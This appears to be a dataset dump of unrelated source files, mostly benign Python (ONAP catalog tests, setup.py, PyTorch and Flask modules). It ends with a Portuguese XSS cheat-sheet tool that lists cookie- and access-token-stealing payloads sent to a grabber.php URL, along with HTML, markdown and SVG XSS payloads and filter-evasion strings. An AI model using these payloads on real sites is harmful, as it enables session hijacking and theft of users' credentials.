('std.unknown', '1.0.1'), ('std.empty.get', '1.0.1')]
assert list(catalog._filter_latest(orms)) == [('std.empty.get', '1.0.1'), \
('std.unknown', '1.0.1')]
def test_raise_if_duplicate():
class FakeOrig(object):
args = ["unique", "duplicate"]
url = "sqlite"
orig = FakeOrig()
error = IntegrityError("Error about uniqueness", None, orig)
with pytest.raises(catalog.DuplicateEntry):
catalog._raise_if_duplicate(url, error)
# Couldn't find psycopg2.IntegrityError constructor nor way
# to set pgcode so decided to mock it.
class FakeOrigPostgres(object):
pgcode = "23505"
url = "postgres"
orig = FakeOrigPostgres()
error = IntegrityError("Error about uniqueness", None, orig)
with pytest.raises(catalog.DuplicateEntry):
catalog._raise_if_duplicate(url, error)
def test_get_docker_image_from_spec():
assert "foo-image" == catalog._get_docker_image_from_spec(_c1_spec)
def test_get_cdap_jar_from_spec():
assert "bahpomet.com" == catalog._get_cdap_jar_from_spec(_cdap_spec)
def test_build_config_keys_map():
stub_spec = {
'streams': {
'publishes': [
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'pub1', 'type': 'http'},
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'pub2', 'type': 'message_router'}
],
'subscribes': [
{'format': 'std.format_one', 'version': '1.0.0', 'route': '/sub1',
'type': 'http'},
{'format': 'std.format_one', 'version': '1.0.0',
'config_key': 'sub2', 'type': 'message_router'}
]
},
'services': {
'calls': [
{'request': {'format': 'std.format_one', 'version': '1.0.0'},
'response': {'format': 'std.format_one', 'version': '1.0.0'},
'config_key': 'call1'}
],
'provides': [
{'request': {'format': 'std.format_one', 'version': '1.0.0'},
'response': {'format': 'std.format_one', 'version': '1.0.0'},
'route': '/prov1'}
]
}
}
grouping = catalog.build_config_keys_map(stub_spec)
expected = {'call1': {'group': 'services_calls'}, 'pub1': {'type': 'http', 'group': 'streams_publishes'}, 'sub2': {'type': 'message_router', 'group': 'streams_subscribes'}, 'pub2': {'type': 'message_router', 'group': 'streams_publishes'}}
assert expected == grouping
def test_get_data_router_subscriber_route():
spec = {"streams": {"subscribes": [ { "type": "data_router", "config_key":
"alpha", "route": "/alpha" }, { "type": "message_router", "config_key":
"beta" } ]}}
assert "/alpha" == catalog.get_data_router_subscriber_route(spec, "alpha")
with pytest.raises(catalog.MissingEntry):
catalog.get_data_router_subscriber_route(spec, "beta")
with pytest.raises(catalog.MissingEntry):
catalog.get_data_router_subscriber_route(spec, "gamma")
if __name__ == '__main__':
'''Test area'''
pytest.main([__file__, ])
| en | 0.768562 | # ============LICENSE_START======================================================= # org.onap.dcae # ================================================================================ # Copyright (c) 2017-2018 AT&T Intellectual Property. All rights reserved. # ================================================================================ # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============LICENSE_END========================================================= # # ECOMP is a trademark and service mark of AT&T Intellectual Property. # -*- coding: utf-8 -*- Tests the mock catalog #", #", #", Tests basic component usage of MockCatalog # success # duplicate # component relies on df1_spec which hasn't been added # add df1 and comp1 Tests basic data format usage of MockCatalog # success # duplicate is bad # allow update of same version # adding a new version is kosher # can't update a format that doesn't exist # get spec and make sure it's updated Tests creation of discovery objects Returns a (name, version, component type) tuple from a given component spec dict Runs a set of component spec tuples Returns a (name, version) tuple from a given data format spec dict Runs a set of data format spec tuples Tests the list functionality of the catalog # latest by default. only v2 of c2 # all components # no comps subscribe to latest std.format_two # raise if format doesn't exist # raise if format doesn't exist # test for listing published components Tests the list functionality of the catalog # latest by default. ensure only v2 of df2 makes it # list all # test listing of published formats Adds a mock CDAP application # Case when c1 doesn't exist # Case when c1 already exist # Case where add in dmaap streams # TODO: Add in subscribes test case after spec gets pushed # Case when cdap spec doesn't exist # detect unpublished formats # all formats published # Couldn't find psycopg2.IntegrityError constructor nor way # to set pgcode so decided to mock it. Test area | 1.600847 | 2 |
setup.py | tejaskannan/adaptive-sensor-security | 0 | 6623931 | <reponame>tejaskannan/adaptive-sensor-security
from setuptools import setup
with open('requirements.txt', 'r') as fin:
reqs = fin.read().split('\n')
setup(
name='adaptiveleak',
version='1.0.0',
author='<NAME>',
email='<EMAIL>',
description='Removing information leakage from adaptive sampling protocols.',
packages=['adaptiveleak'],
install_requires=reqs
)
| from setuptools import setup
with open('requirements.txt', 'r') as fin:
reqs = fin.read().split('\n')
setup(
name='adaptiveleak',
version='1.0.0',
author='<NAME>',
email='<EMAIL>',
description='Removing information leakage from adaptive sampling protocols.',
packages=['adaptiveleak'],
install_requires=reqs
) | none | 1 | 1.326685 | 1 | |
__init__.py | slaclab/LogBookClient | 1 | 6623932 | <filename>__init__.py<gh_stars>1-10
from LogBookClient.LogBookWebService import LogBookWebService
| <filename>__init__.py<gh_stars>1-10
from LogBookClient.LogBookWebService import LogBookWebService
| none | 1 | 1.076829 | 1 | |
projects/CT/CT/positinal_encoding.py | ronenroi/pytorch3d | 0 | 6623933 |
from typing import Tuple
import torch
from pytorch3d.renderer import RayBundle, ray_bundle_to_ray_points
from nerf.nerf.harmonic_embedding import HarmonicEmbedding
class PositionalEncoding(torch.nn.Module):
def __init__(
self,
n_harmonic_functions_xyz: int = 6,
n_harmonic_functions_dir: int = 4,
**kwargs,
):
"""
Args:
n_harmonic_functions_xyz: The number of harmonic functions
used to form the harmonic embedding of 3D point locations.
n_harmonic_functions_dir: The number of harmonic functions
used to form the harmonic embedding of the ray directions.
"""
super().__init__()
# The harmonic embedding layer converts input 3D coordinates
# to a representation that is more suitable for
# processing with a deep neural network.
self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)
self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)
self.embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3
self.embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3
def forward(
self,
points: torch.Tensor,
directions: torch.Tensor,
**kwargs,
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
The forward function embeds the 3D points and rays normalized directions
sampled along projection rays in camera coordinate system.
Args:
points: A tensor of shape `(minibatch, ..., 3)` denoting the
3D points of the sampled rays in camera coords.
directions: A tensor of shape `(minibatch, ..., 3)`
containing the normalized direction vectors of the sampled rays in camera coords.
Returns:
embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)`
represents the 3D points embedding.
embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)`
represents the normalized directions embedding.
"""
# We first convert the ray parametrizations to world
# coordinates with `ray_bundle_to_ray_points`.
# rays_points_world = ray_bundle_to_ray_points(ray_bundle)
# rays_points_world.shape = [minibatch x ... x 3]
directions = self.harmonic_embedding_dir(directions)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3]
# For each 3D world coordinate, we obtain its harmonic embedding.
points = self.harmonic_embedding_xyz(points)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3]
return points, directions
|
from typing import Tuple
import torch
from pytorch3d.renderer import RayBundle, ray_bundle_to_ray_points
from nerf.nerf.harmonic_embedding import HarmonicEmbedding
class PositionalEncoding(torch.nn.Module):
def __init__(
self,
n_harmonic_functions_xyz: int = 6,
n_harmonic_functions_dir: int = 4,
**kwargs,
):
"""
Args:
n_harmonic_functions_xyz: The number of harmonic functions
used to form the harmonic embedding of 3D point locations.
n_harmonic_functions_dir: The number of harmonic functions
used to form the harmonic embedding of the ray directions.
"""
super().__init__()
# The harmonic embedding layer converts input 3D coordinates
# to a representation that is more suitable for
# processing with a deep neural network.
self.harmonic_embedding_xyz = HarmonicEmbedding(n_harmonic_functions_xyz)
self.harmonic_embedding_dir = HarmonicEmbedding(n_harmonic_functions_dir)
self.embedding_dim_xyz = n_harmonic_functions_xyz * 2 * 3 + 3
self.embedding_dim_dir = n_harmonic_functions_dir * 2 * 3 + 3
def forward(
self,
points: torch.Tensor,
directions: torch.Tensor,
**kwargs,
) -> Tuple[torch.Tensor, torch.Tensor]:
"""
The forward function embeds the 3D points and rays normalized directions
sampled along projection rays in camera coordinate system.
Args:
points: A tensor of shape `(minibatch, ..., 3)` denoting the
3D points of the sampled rays in camera coords.
directions: A tensor of shape `(minibatch, ..., 3)`
containing the normalized direction vectors of the sampled rays in camera coords.
Returns:
embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)`
represents the 3D points embedding.
embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)`
represents the normalized directions embedding.
"""
# We first convert the ray parametrizations to world
# coordinates with `ray_bundle_to_ray_points`.
# rays_points_world = ray_bundle_to_ray_points(ray_bundle)
# rays_points_world.shape = [minibatch x ... x 3]
directions = self.harmonic_embedding_dir(directions)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3]
# For each 3D world coordinate, we obtain its harmonic embedding.
points = self.harmonic_embedding_xyz(points)
# embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3]
return points, directions
| en | 0.670844 | Args: n_harmonic_functions_xyz: The number of harmonic functions used to form the harmonic embedding of 3D point locations. n_harmonic_functions_dir: The number of harmonic functions used to form the harmonic embedding of the ray directions. # The harmonic embedding layer converts input 3D coordinates # to a representation that is more suitable for # processing with a deep neural network. The forward function embeds the 3D points and rays normalized directions sampled along projection rays in camera coordinate system. Args: points: A tensor of shape `(minibatch, ..., 3)` denoting the 3D points of the sampled rays in camera coords. directions: A tensor of shape `(minibatch, ..., 3)` containing the normalized direction vectors of the sampled rays in camera coords. Returns: embeds_xyz: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_dir*6 + 3)` represents the 3D points embedding. embeds_dir: A tensor of shape `(minibatch x ... x self.n_harmonic_functions_xyz*6 + 3)` represents the normalized directions embedding. # We first convert the ray parametrizations to world # coordinates with `ray_bundle_to_ray_points`. # rays_points_world = ray_bundle_to_ray_points(ray_bundle) # rays_points_world.shape = [minibatch x ... x 3] # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_dir*6 + 3] # For each 3D world coordinate, we obtain its harmonic embedding. # embeds_xyz.shape = [minibatch x ... x self.n_harmonic_functions_xyz*6 + 3] | 2.729544 | 3 |
rosalind/shared_motif.py | wojwarych/bioinf | 0 | 6623934 | #!/usr/bin/env python3
#! -*- coding: utf-8 -*-
import sys
import toolkit as tk
if __name__ == "__main__":
try:
assert len(sys.argv) > 1
except AssertionError:
print("Did not provide txt file with DNA sequence!")
else:
with open(sys.argv[1], "r") as f:
sequences = []
tmp = []
while True:
line = f.readline().rstrip()
if line.startswith(">Rosalind"):
if tmp:
seq = "".join(tmp)
sequences.append(seq)
tmp = []
else:
tmp.append(line.strip())
if not line:
sequences.append("".join(tmp))
break
for seq in sequences[:2]:
for other_seq in sequences:
print(other_seq, seq)
if other_seq == seq:
continue
n = 0
substr = ""
ret = []
while n < len(seq) and n < len(other_seq):
if other_seq[n] == seq[n]:
substr += other_seq[n]
if substr != "" and other_seq[n] != seq[n]:
ret.append(substr)
substr = ""
n += 1
ret.append(substr)
print(ret)
| #!/usr/bin/env python3
#! -*- coding: utf-8 -*-
import sys
import toolkit as tk
if __name__ == "__main__":
try:
assert len(sys.argv) > 1
except AssertionError:
print("Did not provide txt file with DNA sequence!")
else:
with open(sys.argv[1], "r") as f:
sequences = []
tmp = []
while True:
line = f.readline().rstrip()
if line.startswith(">Rosalind"):
if tmp:
seq = "".join(tmp)
sequences.append(seq)
tmp = []
else:
tmp.append(line.strip())
if not line:
sequences.append("".join(tmp))
break
for seq in sequences[:2]:
for other_seq in sequences:
print(other_seq, seq)
if other_seq == seq:
continue
n = 0
substr = ""
ret = []
while n < len(seq) and n < len(other_seq):
if other_seq[n] == seq[n]:
substr += other_seq[n]
if substr != "" and other_seq[n] != seq[n]:
ret.append(substr)
substr = ""
n += 1
ret.append(substr)
print(ret)
| en | 0.196817 | #!/usr/bin/env python3 #! -*- coding: utf-8 -*- | 3.560528 | 4 |
Beginner/2748.py | LorranSutter/URI-Online-Judge | 0 | 6623935 | <reponame>LorranSutter/URI-Online-Judge
line = '-'*39
blank = '|' + ' '*37 + '|'
blankRoberto = '|' + ' '*8 + 'Roberto' + ' '*22 + '|'
blankNum = '|' + ' '*8 + '5786' + ' '*25 + '|'
blankUNIFEI = '|' + ' '*8 + 'UNIFEI' + ' '*23 + '|'
print(line)
print(blankRoberto)
print(blank)
print(blankNum)
print(blank)
print(blankUNIFEI)
print(line)
| line = '-'*39
blank = '|' + ' '*37 + '|'
blankRoberto = '|' + ' '*8 + 'Roberto' + ' '*22 + '|'
blankNum = '|' + ' '*8 + '5786' + ' '*25 + '|'
blankUNIFEI = '|' + ' '*8 + 'UNIFEI' + ' '*23 + '|'
print(line)
print(blankRoberto)
print(blank)
print(blankNum)
print(blank)
print(blankUNIFEI)
print(line) | none | 1 | 2.659225 | 3 | |
ads/rest/__init__.py | MagnumOpuses/jobscanner.backend | 0 | 6623936 | from flask_restplus import Api, Namespace
api = Api(version='1.0', title='Backend Service for JobScanner',
description='Serving JobScanner',
default='Jobscanner Backend',
default_label="An API for searching and retrieving job ads.")
ns_alljobs = Namespace('All job ads',
description='Finding the majority of Job ads')
ns_skillsandtraits = Namespace('Skills and Traits',
description='Find all Skills and traits per occupation')
ns_jobgeolocation = Namespace('Job location for a specific job',
description='Generate job location for a specific job')
ns_jobgeocount = Namespace('Job count per kommun or lan',
description='Job count per kommun or lan for a specific job')
api.add_namespace(ns_alljobs, '/')
api.add_namespace(ns_skillsandtraits, '/')
api.add_namespace(ns_jobgeolocation, '/job-geolocation')
api.add_namespace(ns_jobgeocount, '/job-geocount')
| from flask_restplus import Api, Namespace
api = Api(version='1.0', title='Backend Service for JobScanner',
description='Serving JobScanner',
default='Jobscanner Backend',
default_label="An API for searching and retrieving job ads.")
ns_alljobs = Namespace('All job ads',
description='Finding the majority of Job ads')
ns_skillsandtraits = Namespace('Skills and Traits',
description='Find all Skills and traits per occupation')
ns_jobgeolocation = Namespace('Job location for a specific job',
description='Generate job location for a specific job')
ns_jobgeocount = Namespace('Job count per kommun or lan',
description='Job count per kommun or lan for a specific job')
api.add_namespace(ns_alljobs, '/')
api.add_namespace(ns_skillsandtraits, '/')
api.add_namespace(ns_jobgeolocation, '/job-geolocation')
api.add_namespace(ns_jobgeocount, '/job-geocount')
| none | 1 | 2.301912 | 2 | |
musicpro/views/reporteriaVentas.py | Felipeplz/MusicPro | 0 | 6623937 | from .conn import *
def viewVentas(request, **kwargs):
id = kwargs.get("id")
result = Conectar().execute("SELECT *"
"FROM [dbo].[VENTA]"
"ORDER BY id_venta ASC").fetchall()
return render(request, 'reporteriaVentas.html', {'SQLVentas':result}) | from .conn import *
def viewVentas(request, **kwargs):
id = kwargs.get("id")
result = Conectar().execute("SELECT *"
"FROM [dbo].[VENTA]"
"ORDER BY id_venta ASC").fetchall()
return render(request, 'reporteriaVentas.html', {'SQLVentas':result}) | none | 1 | 1.980076 | 2 | |
bronze/linear_evolve.py | HasanIjaz-HB/Quantum-Computing | 0 | 6623938 | <reponame>HasanIjaz-HB/Quantum-Computing
def linear_evolve(A,v):
| def linear_evolve(A,v): | none | 1 | 1.073046 | 1 | |
stereo/image/segmentation/seg_utils/models/SE_weight_module.py | nilsmechtel/stereopy | 120 | 6623939 | <reponame>nilsmechtel/stereopy
import torch.nn as nn
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight | import torch.nn as nn
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight | none | 1 | 2.721358 | 3 | |
libs/xss.py | N3w-elf/Hacking_Help | 14 | 6623940 | <filename>libs/xss.py
# BIBLIOTESCAS
# =============================
from os import system
from time import sleep
# =============================
#
#
# Funçao do XSS
def fun_xss():
while True:
system('clear')
print("""
═╗ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗
╩ ╚═╚═╝╚═╝\n
- Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente.
As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n
[01] - Agarrador De Dados Para Xss
[02] - Xss Em Html/aplicativos
[03] - Xss Em Markdown
[04] - Xss Em Svg(Curto)
[05] - Ignorar Lista Negra De Palavras Com Avaliação De Código
[06] - Menu
[99] - Sair
""")
cmd = str(input("===> "))
if cmd == '1':
system('clear')
print("""
╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗
╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗
╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n
- Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada.
> <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
> <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
> <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
> <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '2':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n
> <script>alert('XSS')</script>
> <scr<script>ipt>alert('XSS')</scr<script>ipt>
> "><script>alert("XSS")</script>
> "><script>alert(String.fromCharCode(88,83,83))</script>
> <img src=x onerror=alert('XSS');>
> <img src=x onerror=alert('XSS')//
> <img src=x onerror=alert(String.fromCharCode(88,83,83));>
> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
> <img src=x:alert(alt) onerror=eval(src) alt=xss>
> "><img src=x onerror=alert("XSS");>
> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '3':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n
> [a](javascript:prompt(document.cookie))
> [a](j a v a s c r i p t:prompt(document.cookie))
> [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
> [a](javascript:window.onerror=alert;throw%201)
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '4':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n
> <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '5':
system('clear')
print("""
╦╔═╗╔╗╔╔═╗╦═╗╔═╗╦═╗ ╦ ╦╔═╗╔╦╗╔═╗ ╔╗╔╔═╗╔═╗╦═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔═╗╦ ╔═╗╦ ╦╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ ╔═╗╦ ╦╔═╗╦ ╦╔═╗╔═╗ ╔╦╗╔═╗ ╔═╗╔╦╗╦╔═╗╔═╗
║║ ╦║║║║ ║╠╦╝╠═╣╠╦╝ ║ ║╚═╗ ║ ╠═╣ ║║║║╣ ║ ╦╠╦╝╠═╣ ║║║╣ ╠═╝╠═╣║ ╠═╣╚╗╔╝╠╦╝╠═╣╚═╗ ║ ║ ║║║║ ╠═╣╚╗╔╝╠═╣║ ║╠═╣║ ║ ║║║╣ ║ ║║║║ ╦║ ║
╩╚═╝╝╚╝╚═╝╩╚═╩ ╩╩╚═ ╩═╝╩╚═╝ ╩ ╩ ╩ ╝╚╝╚═╝╚═╝╩╚═╩ ╩ ═╩╝╚═╝ ╩ ╩ ╩╩═╝╩ ╩ ╚╝ ╩╚═╩ ╩╚═╝ ╚═╝╚═╝╩ ╩ ╩ ╩ ╚╝ ╩ ╩╩═╝╩╩ ╩╚═╝ ═╩╝╚═╝ ╚═╝═╩╝╩╚═╝╚═╝\n
> eval('ale'+'rt(0)');
> Function('ale'+'rt(1)')();
> new Function`alert`6``;
> setTimeout('ale'+'rt(2)');
> setInterval('ale'+'rt(10)');
> Set.constructor('ale'+'rt(13)')();
> Set.constructor`alert(14)```;
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '6':
break
elif cmd == '99':
print("Até logo...")
exit()
else:
print("Comando Inválido!!!")
sleep(2)
| <filename>libs/xss.py
# BIBLIOTESCAS
# =============================
from os import system
from time import sleep
# =============================
#
#
# Funçao do XSS
def fun_xss():
while True:
system('clear')
print("""
═╗ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗
╩ ╚═╚═╝╚═╝\n
- Os Ataques Cross-site Scripting (Xss) São Um Tipo De Injeção, Na Qual Scripts Maliciosos São Injetados Em Sites Benignos E Confiáveis. Os Ataques Xss Ocorrem Quando Um Invasor Usa Um Aplicativo Da Web Para Enviar Código Malicioso, Geralmente Na Forma De Um Script Do Lado Do Navegador, Para Um Usuário Final Diferente.
As Falhas Que Permitem Que Esses Ataques Sejam Bem-sucedidos São Bastante Difundidas E Ocorrem Em Qualquer Lugar Em Que Um Aplicativo Da Web Usa A Entrada De Um Usuário Na Saída Que Gera Sem Validá-la Ou Codificá-la.\n
[01] - Agarrador De Dados Para Xss
[02] - Xss Em Html/aplicativos
[03] - Xss Em Markdown
[04] - Xss Em Svg(Curto)
[05] - Ignorar Lista Negra De Palavras Com Avaliação De Código
[06] - Menu
[99] - Sair
""")
cmd = str(input("===> "))
if cmd == '1':
system('clear')
print("""
╔═╗╔═╗╔═╗╦═╗╦═╗╔═╗╔╦╗╔═╗╦═╗ ╔╦╗╔═╗ ╔╦╗╔═╗╔╦╗╔═╗╔═╗ ╔═╗╔═╗╦═╗╔═╗ ═╗ ╦╔═╗╔═╗
╠═╣║ ╦╠═╣╠╦╝╠╦╝╠═╣ ║║║ ║╠╦╝ ║║║╣ ║║╠═╣ ║║║ ║╚═╗ ╠═╝╠═╣╠╦╝╠═╣ ╔╩╦╝╚═╗╚═╗
╩ ╩╚═╝╩ ╩╩╚═╩╚═╩ ╩═╩╝╚═╝╩╚═ ═╩╝╚═╝ ═╩╝╩ ╩═╩╝╚═╝╚═╝ ╩ ╩ ╩╩╚═╩ ╩ ╩ ╚═╚═╝╚═╝\n
- Obtém O Cookie Do Administrador Ou Token De Acesso Confidencial, A Seguinte Carga O Enviará Para Uma Página Controlada.
> <script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
> <script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
> <script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
> <script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '2':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╦ ╦╔╦╗╔╦╗╦ ╔═╗ ╔═╗╔═╗╦ ╦╔═╗╔═╗╔╦╗╦╦ ╦╔═╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╠═╣ ║ ║║║║ ║╣ ╠═╣╠═╝║ ║║ ╠═╣ ║ ║╚╗╔╝║ ║╚═╗
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩ ╩ ╩ ╩╩═╝ ╚═╝ ╩ ╩╩ ╩═╝╩╚═╝╩ ╩ ╩ ╩ ╚╝ ╚═╝╚═╝ \n
> <script>alert('XSS')</script>
> <scr<script>ipt>alert('XSS')</scr<script>ipt>
> "><script>alert("XSS")</script>
> "><script>alert(String.fromCharCode(88,83,83))</script>
> <img src=x onerror=alert('XSS');>
> <img src=x onerror=alert('XSS')//
> <img src=x onerror=alert(String.fromCharCode(88,83,83));>
> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
> <img src=x:alert(alt) onerror=eval(src) alt=xss>
> "><img src=x onerror=alert("XSS");>
> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '3':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔╦╗╔═╗╦═╗╦╔═╔╦╗╔═╗╦ ╦╔╗╔
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ║║║╠═╣╠╦╝╠╩╗ ║║║ ║║║║║║║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╩ ╩╩ ╩╩╚═╩ ╩═╩╝╚═╝╚╩╝╝╚╝ \n
> [a](javascript:prompt(document.cookie))
> [a](j a v a s c r i p t:prompt(document.cookie))
> [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
> [a](javascript:window.onerror=alert;throw%201)
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '4':
system('clear')
print("""
═╗ ╦╔═╗╔═╗ ╔═╗╔╦╗ ╔═╗╦ ╦╔═╗ ╔═╗╦ ╦╦═╗╔╦╗╔═╗
╔╩╦╝╚═╗╚═╗ ║╣ ║║║ ╚═╗╚╗╔╝║ ╦ ║ ║ ║╠╦╝ ║ ║ ║
╩ ╚═╚═╝╚═╝ ╚═╝╩ ╩ ╚═╝ ╚╝ ╚═╝ ╚═╝╚═╝╩╚═ ╩ ╚═╝\n
> <svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
> <svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
> <svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
> <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
""")
input("[*] - Pressione ENTER para voltar...")
fun_xss()
break
elif cmd == '5':
system('clear')
print("""
